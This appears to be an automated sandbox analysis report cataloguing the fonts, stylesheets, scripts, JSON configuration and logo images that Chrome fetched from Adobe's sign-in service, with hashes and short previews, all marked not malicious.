                                                                                                      SHA-256:62517736E6872FB13CE951C67D689DEF5F6AC4AC222299BFE1E37AC5F05C37AD
                                                                                                      SHA-512:2829D0BE5E38771D56D92371DD9A4131ECDEC577C50481043914A525DE1F0EB9197C731E549F67625EB954EE611377C771126A2A764F0E68B5928476DE05543A
                                                                                                      Malicious:false
                                                                                                      URL:https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?subset_id=2&fvd=n4&v=3
                                                                                                      Preview:wOF2OTTO..t........(..t..........................F...s?DYNA.i?GDYN.y..r.`..N...6.$..H...... .)...H........Q..aDA.........U...~..?../.....?B...w..{....:`v...9?/y'I..9@I...@..3V@....%WX{'...T@...`./Q...V.Tz....g( .... .....sFO...2..j.n..R....HBI.!.r[n.VR ...JhM.Aj.HI.~....o.&...q..\Gr..8T7..I!(1.0.t..B...Mq....)c....7..Mk)!..]....1k;.d....6..y..N4z...L.B).....'.*.T...Q..?......N>.|...+...V....K..e...I.#..b.j.................BN....B.#.T.._|.....V.:...E.\v./y...$.h....H.Y...;.L*..h..Y.}I.C..U!tR%.pS...i......STU|..).y...P.Y..4`...c.].w..E.>.[.u.R.._..2 )....}.R......... ..Cc!S......)*.$....4#hC...5O....``....0......O....&W..`....d..."...a(....4CP..d..(|.wY.n.I......a*..x....0..xO...~..}.._E.i.3....0k..i@....p.F. ...a....0..a._....w...Z.s...c..&.3.h.wY.W../_~.6.J...H...+......k...D.NKi_..}....K(q^;o}.v..&.>.+...b...m......x..R....B.....|I)Mn1..'.R/..t..Yb4..~.M.C.L.+.....[.......W.A..jc.n...........T3.qyow*..1....+7..K.p.v.^.LU'Z.|....
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):88
                                                                                                      Entropy (8bit):5.052721960207516
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:6uhAiCnrF992y5jf3XsbjRAtbKx:FeiCnJT1XsbtAtk
                                                                                                      MD5:0062BBE081DFA63A7FE5E3359FE15343
                                                                                                      SHA1:EBD32BFAEDF5D2D5E6E94D577828B6FF20544A9A
                                                                                                      SHA-256:A48A10C18815B219219827E60CAFBA7C4CF0B430EAF81465F11B1C6D2B5D6C5E
                                                                                                      SHA-512:8700B1EFE3C8307B468FAB16BC986AC36BECCD783401AD3CBB5F1EBA4DA679D1B192D59A83E69461DEFE7874AA6F0792A30788A0B9C589D94B56F5E6275A0172
                                                                                                      Malicious:false
                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwkBIssKQ8rBIhIFDVNVgbUSBQ1Xevf9?alt=proto
                                                                                                      Preview:CkAKDQ1TVYG1GgQIVhgCIAEKLw1Xevf9GgQISxgCKiIIClIeChQhQC4jJCpfLT8mKyUvLF4pOj0ofhABGP////8P
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (2258)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):17008
                                                                                                      Entropy (8bit):5.5502271222360395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:cx2hpIgIVsUGiRm4lIeU4iDFeFs2NdFJsQF+i:cR7GiRm4X0JqsG7Ui
                                                                                                      MD5:A10396392AF7006E81573A789F8F0367
                                                                                                      SHA1:187F5E45A312D581FE4248DFF447F6DC4DDB208D
                                                                                                      SHA-256:92C86130DAF66FC1BCEF9A45A15608ABE448740ABDC3BCA1EEE9301767DDAF8B
                                                                                                      SHA-512:092900888FD08AE5B5458E91F92880EF10D909BA9F4656FB8DD80B9A4E24760213D5CB02E5BD6849360797FDD1D0D85E71BF4A6C868A40C9110EF3F7765300EA
                                                                                                      Malicious:false
                                                                                                      Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/000000000000000000017701. * - http://typekit.com/eulas/000000000000000000017703. * - http://typekit.com/eulas/0000000000000000000176ff. *. * . 2009-2024 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1164490","c":[".tk-adobe-clean","\"adobe-clean\",sans-serif"],"fi":[7180,7182,7184],"fc":[{"id":7180,"family":"adobe-clean","src":"https://use.typekit.net/af/cb695f/000000000000000000017701/27/{format}{?primer,subset_id,fvd,v}","descriptors":{"weight":"400","style":"normal","stretch":"normal","display":"auto","variable":false,"subset_id":2}},{"id":7182,"family":"adobe-clean","src":"https://use.typekit.net/af/eaf09c/0000000
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2125
                                                                                                      Entropy (8bit):4.891233430290872
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Y0ZW3+3LwJSX5B5AKNrYUBjR3LENEJuNrE5vYWr1VANWKVFucVkLAgNs3BSPvT8z:Y0sOcyP5AYpw+JuhEZ7bU4qkULB0vC
                                                                                                      MD5:47A86FC387427D62E1B3E332E5EC47DC
                                                                                                      SHA1:ABA482C1B522E72A24A55805614095150031F8FC
                                                                                                      SHA-256:010F398A19CD28239BBEF458C7FECC94884923AC907F9ECD80F1C4D985C9D265
                                                                                                      SHA-512:BF2889CD03F091638501A54C98C165953A2AC92450F90F55AD1994797DF89F10ABC72EF5072F7E911D2D999AA25A740A4CAC673E4610FA4266F2C74CADCECAC6
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/signin/v2/configurations/CC_HD_ESD_WEB
                                                                                                      Preview:{"allowedAccountTypes":["enterprise","individual","entitlement","federated"],"accountCreationEnabled":true,"deviceOptInEnabled":false,"externalLinksEnabled":true,"cancelButtonEnabled":false,"jarvisV2Enabled":true,"fraudAiEnabled":false,"passwordlessOptInEnabled":false,"ssoEnabled":true,"chromelessLinksEnabled":false,"emailVerificationPolicy":"DELAYED","termsOfUseName":"ADOBE_MASTER","marketingConsentProfile":"trial","coppaEnforcement":"DateOfBirthOrExternal","reauthTtl":900,"retryAfter":3,"updatePasswordAllowedFactors":["EMAIL","PHONE","TOTP","PASSWORD","CODE_LOGIN"],"mfaInsteadOfCaptcha":true,"timeframeInvitesOutvites":604800000,"assetMigrationTimeout":180000,"type1MarketingConsentEnabled":false,"t2eDefaultFilter":"","t2eAccountFilteringEnabled":true,"recaptchaJsTimeoutMilli":5000,"externalContextMarker":"https://oobe.adobe.com/type3","contextSwitchingMarkerEnabled":false,"encodeExternalContextMarkerUrlEnabled":false,"arkoseCaptchaEnabled":true,"arkoseCaptchaSignInEnabled":true,"arkos
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):527444
                                                                                                      Entropy (8bit):5.536911396166347
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:mGln94OeevNKfHvMy6aOT7Rc5jfZnFl5hPy:zvNKZa
                                                                                                      MD5:E3F310C7E6D9D413D2EEC12B62AEE276
                                                                                                      SHA1:7495577486F3A638E428D3F045814478C1531B6A
                                                                                                      SHA-256:CF138AF3C7B5F75AB312B1818D001649DC2F64AA4C9FA02D1B8254CD384973E6
                                                                                                      SHA-512:5C7B6F53DB27DDC24F377CECEDEFF4A37A01C7F99EA2DDFC44CDF125DB92B26D89B9663CCACBA50040A987131F0AB79537E35F70CDD102EA668268F17B206119
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/8d9e4eb26/styles.c1bc4a6b.css
                                                                                                      Preview:.ActionList-Item__container{padding:24px 16px 24px 10px}.ActionList-Item__container,.ActionList-Item__container-no-padding{display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center}@media screen and (min-width:768px){.CardLayout__content--full-width{margin:0 -56px}.ActionList-Item:not(:last-child):after{left:56px;right:56px}.ActionList-Item__container{padding:24px 40px 24px 50px}}.spectrum-Icon,.spectrum-UIIcon{display:inline-block;color:inherit;fill:currentColor;pointer-events:none}.spectrum-Icon:not(:root),.spectrum-UIIcon:not(:root){overflow:hidden}.spectrum-Icon--sizeS,.spectrum-Icon--sizeS img,.spectrum-Icon--sizeS svg{height:18px;width:18px}.spectrum-Icon--sizeM,.spectrum-Icon--sizeM img,.spectrum-Ic
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Web Open Font Format (Version 2), CFF, length 29980, version 1.0
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):29980
                                                                                                      Entropy (8bit):7.991242817341188
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:Qe9rpy2HXqWLQHZGKdRNVaFFHvYk9ur4QMvkQ5OAe0kM/1uwOnz6AuPtUZfLLcBt:QCrB/MHpIZCgsQ5Xkbwo6A+UZncXp0E
                                                                                                      MD5:864FC6D95444FD085441968A712F6C9F
                                                                                                      SHA1:7E54F060DF28A16E146AB1EB15AB3A59D3D9BE06
                                                                                                      SHA-256:371F06319FA71DE555AEBEFCFFBE3C1F755E5761D90AACD9BBA0C64C6CF40090
                                                                                                      SHA-512:7CADDDDCD35910BC04D80EB10F0776BBF7C770AFCF960FBBDFCC8E8DB1BACD694883A3E9A1540552B544AE639FA42C9B79690ADB81F7D5210467B6494BA25880
                                                                                                      Malicious:false
                                                                                                      URL:https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?subset_id=2&fvd=n7&v=3
                                                                                                      Preview:wOF2OTTO..u........0..t..........................F...D?DYNA.i?GDYN.y..H.`..N...6.$..H...... .5...H..V.CDE....}........W.?@..................o.9.%r.xtl%V.H9I....{..;.3..._..Km...LL..5...$..d.-*0.b(...;I $..Vc3.d..|....9..=f..,....4../*......-..J..z...r...C.%....U.V,....T.l......q%...A..]I....E..$.......s...N...p.(4Is.K.r.C.v.L.a...(.e..{............m!...\&p.T2S.O..e...?....#...ylj..!....d....W..E...Q....y..z...!X..^QY..W_9..x...?...M.*..!.......,+`YV.e]........?V.{.jd..+krf.3K?.9...,.8....CREr...YLf..?.3.dqv..\...pU...H`!..*+...l}..)....J.....M.P.;.......;w.....Zw...(.....lM..zj....`X.:.CqL.L..?.....d./...l.y9..xy;. ...P.X .I.l....Y......5'.0S'..L../...p.....+.B.. ....eb..:3.ns..B..a........~L.....R.w..!E.9{.}..dB%.zxq.5.F. ..q0.f.|X..|.o.m..+w.....<&...k9{..&......+...s..."..d2.u.UC..q.K..8....VC'qr.....j[.qb2NZ!.N.O.:._...e..*.C.u..5.8....t.h+...:..!Lv>8......<J......R......A:B.Gg...:.6K.J.N... ......uIl.V.C....{....X..uS.2.)..=..s
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):22
                                                                                                      Entropy (8bit):3.9139770731827506
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YQbLSPLSn:YQaP2
                                                                                                      MD5:B8BDE140938211AD10CCEDF19647E04E
                                                                                                      SHA1:7EC6DCA96E0EFF00C7C548FC1D006A5338FC7F14
                                                                                                      SHA-256:0FDEE8E506F20BD5FA3B7908598C0FC77A422A1B22C28A339A99F01ECB43996C
                                                                                                      SHA-512:09B8C657B6EE78E265F925E50C44A089333ED56200F047F0505308C804CE2F96ABC41367C4D9B4385F6907A831ED22617815CFF74755BB1E4F8E58C4619E78AD
                                                                                                      Malicious:false
                                                                                                      URL:https://server.messaging.adobe.com/core/v1/messaging/ui-version
                                                                                                      Preview:{"uiVersion":"2.75.8"}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):79
                                                                                                      Entropy (8bit):4.445955989056745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YAqtEYXZDD/mJkDWQiFAr44n:YAqFJW6rDn
                                                                                                      MD5:BFC849564D1AF8D5B164CE971B8BA82B
                                                                                                      SHA1:8E0367C2117FE9D3E207A96F474C1704C4F35BD5
                                                                                                      SHA-256:E53D20DBDC6BA66258D7BCA3543FD3C8F9BAEC6FF56EFA7CB1625543021B4859
                                                                                                      SHA-512:31E05CDF1F1065F73B7912B1D19245C7ADDCA7638402E6A841805A01F02E182991D3CF002B4BE16D8439880922E47298222E2E8EEE7206A63E2980342DA6DB29
                                                                                                      Malicious:false
                                                                                                      Preview:{"errorCode":"invalid_field","errorMessage":"clientId must not be empty: null"}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):62921
                                                                                                      Entropy (8bit):4.849160494541888
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:YZkTXdHEP0fCPP9ZsS4jEzjxE5rz2560AJv2ndnrEkUDdiTBRbV:YSTXdHEPCNjEzjm5rz2560AF2ndnrEkb
                                                                                                      MD5:479221735003F195FC966EE1A416FE45
                                                                                                      SHA1:F98F1834E1FB5C06CCE29EED1D3FF8B57CAAE836
                                                                                                      SHA-256:19486378CEF46557FEABDB715E35E5EA1DD4F6F4C516DD5F1B7C2C3FC2C9A659
                                                                                                      SHA-512:469BCFC6EC619CF387A0191994F951999788439F1AD64624C8B74A67DE9E50CD54F824B14B41B36D14846F8CFF71828EE7E7F3CB6D32DE8DD0ABB031D03FC9BB
                                                                                                      Malicious:false
                                                                                                      Preview:{"attributions":{"behance":"Behance","stock":"Stock","creativeCloud":"Creative Cloud"},"common":{"backBtn":"Back","goBackBtn":"Go back","resend":"Resend","learnMoreAccountTypes":"Learn more about account types","resendCode":"Resend Code","receiveCodeAnotherWay":"Receive code another way","back":"Sign in with a different email address","selectAccount":"Select an account","changeAccount":"Sign in to a different account","continue":"Continue","continueWithEmail":"Continue with email","signInWithPasskey":"Sign in with passkey","returnToSignIn":"Return to sign in","returnToSignUp":"Return to sign up","accept":"Accept","cancel":"Cancel","confirm":"Confirm","change":"Change","close":"Close","done":"Done","ok":"OK","signin":"Sign in","signout":"Sign out","learnMore":"Learn more","viewMore":"View more","viewLess":"View less","skip":"Skip","notNow":"Not now","steps":"Step {0} of {1}","retrieve":"Retrieve","signInWithCode":"Continue with code","accountTypes":{"individual":"Personal Account","ente
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1797
                                                                                                      Entropy (8bit):4.631584269642909
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2d/E1mN9OBEdJKpTzvkbxmDyeX9MUS6ifS4vrZm/e+It92k5jf7d1jSJXKkcn0E:c/UWJKMpeiUTCmG+I335jzDjSJ6kbE
                                                                                                      MD5:F639F757A2B5B00E98F3F1EA31404C1E
                                                                                                      SHA1:C625262F64F47B4D92B4A61CBC509671941DC9EA
                                                                                                      SHA-256:AE1F7BC6026339F4355FC367C8F13F971CB3E06E528321663F8A41B53587D9CE
                                                                                                      SHA-512:F66758828FC5ED03CB8D7C4A80E013C2D1978D3AF625AE4203BF4CB043D4DA38F3CEDBB9EB3BC514936B25B8DD62C665F13030B8D0CD3192F969F161C269F3E6
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/round/line.svg
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg id="Layer_2" data-name="Layer 2" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 28 28">. <defs>. <style>. .cls-1 {. fill: #06c755;. }.. .cls-1, .cls-2 {. stroke-width: 0px;. }.. .cls-2 {. fill: #fff;. }. </style>. </defs>. <g id="LINE_LOGO" data-name="LINE LOGO">. <g>. <rect class="cls-1" x="6" y="6" width="16" height="16" rx="3.61" ry="3.61"/>. <g>. <path class="cls-2" d="m19.33,13.25c0-2.39-2.39-4.33-5.33-4.33s-5.33,1.94-5.33,4.33c0,2.14,1.9,3.93,4.46,4.27.17.04.41.11.47.26.05.13.03.35.02.48,0,0-.06.38-.08.46-.02.13-.11.53.46.29.57-.24,3.07-1.81,4.19-3.1h0c.77-.85,1.14-1.71,1.14-2.66h0Z"/>. <g>. <path class="cls-1" d="m17.56,14.62h-1.5c-.06,0-.1-.05-.1-.1h0v-2.33h0c0-.06.05-.1.1-.1h1.5c.06,0,.1.05.1.1v.38c0,.06-.05.1-.1.1h-1.02v.39h1.02c.06,0,.1.05.1.1v.38c0,.06-.05.1-.1.1h-1.02v.39h1.02c.06,0,.1.05.1.1v.38c0,.06-.05.1-.1.1h0Z"/>. <path
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1241
                                                                                                      Entropy (8bit):4.649162120071889
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t8SYcRjJhx/jywbPB3rQUrdSo/gdfmEcKJaan+x8J1DYW+u8wjI:5VjhjywbNrQUBSoIdfrTJY8J1DYW+u8f
                                                                                                      MD5:F3D8620B91A594708B45B74945D91C5C
                                                                                                      SHA1:5D8A283E9E07ADE59AE6A6C2358FEB8DABB82C76
                                                                                                      SHA-256:C7AB8D6C9467379D20F162C6F04FE508C6411D2799E59852E59CDB89CDDE2966
                                                                                                      SHA-512:3B5D029730C9AECE4A47D1DDD2364EEE1E4AE5421F710A38B078C02FCD1B486799CD0D84EEB2C8581B6A77F1F682EAB9592FEF5BB32057D22574B9E0332888FB
                                                                                                      Malicious:false
                                                                                                      Preview:<svg id="Group_155509" data-name="Group 155509" xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50">. <rect id="Background" width="50" height="50" rx="25"/>. <g id="Group_74582" data-name="Group 74582" transform="translate(14.5 10.502)">. <path id="Apple_logo_black" d="M37.33,23.428a13.555,13.555,0,0,1-1.34,2.41,12.244,12.244,0,0,1-1.727,2.087,3.349,3.349,0,0,1-2.219.977,5.562,5.562,0,0,1-2.05-.489,5.882,5.882,0,0,0-2.207-.488,6.081,6.081,0,0,0-2.269.488,6.106,6.106,0,0,1-1.961.516,3.154,3.154,0,0,1-2.269-1,12.857,12.857,0,0,1-1.806-2.161,14.943,14.943,0,0,1-1.91-3.793,13.89,13.89,0,0,1-.8-4.521,8.256,8.256,0,0,1,1.084-4.319,6.36,6.36,0,0,1,2.271-2.3,6.108,6.108,0,0,1,3.07-.866,7.228,7.228,0,0,1,2.374.553,7.633,7.633,0,0,0,1.883.554,11.269,11.269,0,0,0,2.088-.652,6.9,6.9,0,0,1,2.839-.5A6.027,6.027,0,0,1,37.1,12.4a5.252,5.252,0,0,0-2.785,4.771,5.263,5.263,0,0,0,1.728,3.966,5.679,5.679,0,0,0,1.727,1.133q-.208.6-.44,1.156ZM32.519,4.5a5.319,5.319,0,0,1-1.363,
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):271160
                                                                                                      Entropy (8bit):5.547687723035138
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:GVeF/OwGRgA1PCpk8rD9VJx1SIjGdQh1R6mX4:GVeflP1SGB9o
                                                                                                      MD5:5C52574099F1BE17250D9127E3A8D515
                                                                                                      SHA1:F06867CAD1359342F70C3CB1368E7AABE10B74E3
                                                                                                      SHA-256:71ED066BA926C37EFB9E2A351119BD6089C0C31AC32A3E64BB842EC6B0109FA9
                                                                                                      SHA-512:C2C114FEB2DE378816BF351F7F5CBBBB3C2155D239A383A6B5D1F71E88871186AA59A8FF9E081524B8D35D192C05BACF763FB84E69C76E49680972F6E2DEF126
                                                                                                      Malicious:false
                                                                                                      URL:https://adobe-api.arkoselabs.com/v2/2.11.2/enforcement.680e9fec55645f785d2cc2dbf0b3e151.js
                                                                                                      Preview:var arkoseLabsClientApi7f09c9f9;!function(){var t,e,n,r,o={1891:function(t,e){"use strict";e.J=void 0;var n=/^([^\w]*)(javascript|data|vbscript)/im,r=/&#(\w+)(^\w|;)?/g,o=/&tab;/gi,i=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,a=/^.+(:|&colon;)/gim,c=[".","/"];e.J=function(t){var e,u=(e=t||"",(e=e.replace(o,"&#9;")).replace(r,(function(t,e){return String.fromCharCode(e)}))).replace(i,"").trim();if(!u)return"about:blank";if(function(t){return c.indexOf(t[0])>-1}(u))return u;var s=u.match(a);if(!s)return u;var f=s[0];return n.test(f)?"about:blank":u}},8787:function(t,e){"use strict";function n(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function r(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function o(t,e,n){return e&&r(t.prototype,e),n&&r(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(t){return i=Object.setPr
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65297)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):4256355
                                                                                                      Entropy (8bit):5.405364083343942
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:tOCiTfd2WSuLYHo0Uo4T3AAJn+qOQqTpb075vc:cCi7d2WSuLYHo0Uo4T3AAJn+3QqTpb0u
                                                                                                      MD5:8A56E23C7FCCD2F773B4AE59BAA81367
                                                                                                      SHA1:69C32593C66372D79205342CA40BD4AB35B66444
                                                                                                      SHA-256:9F86C194C3D3E01E2BB456D0C240AB8E72925A35D62698060C7EF6E98105B016
                                                                                                      SHA-512:D671242EA8B12B73961F59498CAFC7AEE86FAE90671840A718889463C2E6D3347C551CAFB344CD69712A398913EE8324D4E458684935101A01F65FE021EB8B08
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/8d9e4eb26/scripts.js
                                                                                                      Preview:/*! For license information please see scripts.js.LICENSE.txt */.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="/",r(r.s=575)}([function(e,t,r){"use
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1923
                                                                                                      Entropy (8bit):4.58221937716664
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cyjp5JKonwXuczIo9Io9Iq23IMCQl7/jYIBQZQUPH:3LJ031919k9f7jrBQxv
                                                                                                      MD5:DD9BE0188FAD7B70E52624E7359F1C28
                                                                                                      SHA1:6C1458F73FEE69BCED6CA621FBF0FE7C100E1B42
                                                                                                      SHA-256:21356A5723CD98BD26A7A7D9A5A2A97529C622BFF44E53793EE7D2DF95438CD8
                                                                                                      SHA-512:228F1840617F0EC19ED65F6A9300630BFD0D0CA71657C0A3FB707949A2F98E4D440B8F82C397CC538BB6A9E7C35C7AB88C5FE8D9487022A24512B93C6F95E8F1
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/sml-line-logo.svg
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg id="LINE_LOGO" data-name="LINE LOGO" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">. <defs>. <style>. .cls-1 {. fill: #4cc764;. }.. .cls-1, .cls-2 {. stroke-width: 0px;. }.. .cls-2 {. fill: #fff;. }. </style>. </defs>. <circle class="cls-1" cx="25" cy="25" r="25"/>. <g>. <path class="cls-2" d="m41.67,23.54c0-7.47-7.49-13.54-16.69-13.54s-16.69,6.08-16.69,13.54c0,6.7,5.94,12.3,13.96,13.36.54.12,1.28.36,1.47.82.17.42.11,1.08.05,1.51,0,0-.2,1.18-.24,1.43-.07.42-.34,1.65,1.45.9,1.78-.75,9.61-5.66,13.11-9.69h0c2.42-2.65,3.58-5.34,3.58-8.33Z"/>. <g>. <path class="cls-1" d="m36.12,27.86c.18,0,.32-.14.32-.32v-1.18c0-.18-.14-.32-.32-.32h-3.19v-1.23h3.19c.18,0,.32-.14.32-.32v-1.18c0-.18-.14-.32-.32-.32h-3.19v-1.23h3.19c.18,0,.32-.14.32-.32v-1.18c0-.18-.14-.32-.32-.32h-4.69c-.18,0-.32.14-.32.32h0v7.28h0c0,.18.14.32.32.32h4.69Z"/>. <path class="cls-1" d="m18.78,27.86c.18
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):103
                                                                                                      Entropy (8bit):5.521886478851169
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YGEVRGWOGMEinUTWrBU4Uv57dRqtewLAN:YGEV0G9iUTWOq1LAN
                                                                                                      MD5:A78BD698C13DF104254F063D4DA11FD6
                                                                                                      SHA1:2501CA443D9AFCF509BCE2F02FF08534686EEF33
                                                                                                      SHA-256:5A7E91121E79920B99FF202EA74D2FF0704C3D8DEBA9EED3329C33123E104179
                                                                                                      SHA-512:3EE33233F78D831192243571676ED442219A2AA076CD99C3481B3BDE3788472FFE31BC91694BC9B882BB23A50EECDC3F98F228979ADF6D6897B545BCBBDCF135
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/signin/v1/captcha/encryptedData
                                                                                                      Preview:{"captchaEncryptedData":"aBX1VSFp65s7KLQw.D4fUmqH/cfJDcMu2uXvq+qJc1IMMEa4VKLWM8cnyJZRo5Sh4Sl9gni5k86o"}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):748
                                                                                                      Entropy (8bit):4.660933852975397
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t4NlfPGECSOn7QVP8B/HaqhAX7dU2SHalK3eRVnzKmQweoxGIJeJMcfNr77JBTyn:t4NlfPGjn7h1HaqAX7dtRK+Jz9eoxdJL
                                                                                                      MD5:4C5A5A172465BEFD580445C07F70F2F0
                                                                                                      SHA1:8FAF7BDA342FC570795E46B6DD908AFE3BB49B8F
                                                                                                      SHA-256:14C7E9928FABB3ACF7BC07024069E2ACDAED31BC66EBDCB1FCA8E38D27B8037F
                                                                                                      SHA-512:F6B05E5116FABA49803BCE3F5731CDA12C8E9CD60A984F8515800B1276ED3025671E9A40F1254380140C6C9F97CAA5BE4B79DDBB5180294DED3761357ED64306
                                                                                                      Malicious:false
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 26.034 32"><g transform="translate(0 0)"><path d="M31.354,22.608a7.272,7.272,0,0,1,3.463-6.1,7.444,7.444,0,0,0-5.865-3.171c-2.468-.259-4.86,1.477-6.117,1.477-1.282,0-3.218-1.451-5.3-1.408a7.811,7.811,0,0,0-6.573,4.009c-2.842,4.921-.722,12.152,2,16.129,1.362,1.948,2.954,4.123,5.037,4.046,2.038-.085,2.8-1.3,5.26-1.3,2.438,0,3.152,1.3,5.277,1.251,2.187-.035,3.565-1.956,4.88-3.922a16.109,16.109,0,0,0,2.231-4.544,7.027,7.027,0,0,1-4.29-6.465Z" transform="translate(-9.609 -5.59)"/><path d="M23.551,12.976a7.16,7.16,0,0,0,1.638-5.13,7.285,7.285,0,0,0-4.714,2.439,6.813,6.813,0,0,0-1.681,4.94A6.024,6.024,0,0,0,23.551,12.976Z" transform="translate(-5.82 -7.847)"/></g></svg>.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1200, components 3
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):222975
                                                                                                      Entropy (8bit):7.978357450570736
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:qEae9vAOOU9DVq30kJ4ilupgLDwXZJyjgy59T:FxOyg30kJ4iAuLTjgy7
                                                                                                      MD5:EBB622283A008A598D5E51B3BCF74F13
                                                                                                      SHA1:5161619986CBBBABF1D772C72CFB6B84A38F5A42
                                                                                                      SHA-256:7864398D3C7F69CB529E871E89D1459CC385E8EBA6D2D4AB20117576770951E9
